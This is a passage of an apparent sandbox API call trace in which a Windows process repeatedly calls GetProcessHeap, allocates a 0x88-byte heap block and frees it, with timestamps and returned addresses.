[0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.070] GetProcessHeap () returned 0xe30000 [0101.070] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.070] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0101.071] GetProcessHeap () returned 0xe30000 [0101.071] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.072] GetProcessHeap () returned 0xe30000 [0101.072] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.073] GetProcessHeap () returned 0xe30000 [0101.073] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.074] GetProcessHeap () returned 0xe30000 [0101.074] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.074] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.076] GetProcessHeap () returned 0xe30000 [0101.076] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825698 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825698 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.077] GetProcessHeap () returned 0xe30000 [0101.077] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.077] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825698 [0101.078] GetProcessHeap () returned 0xe30000 [0101.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825698 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, 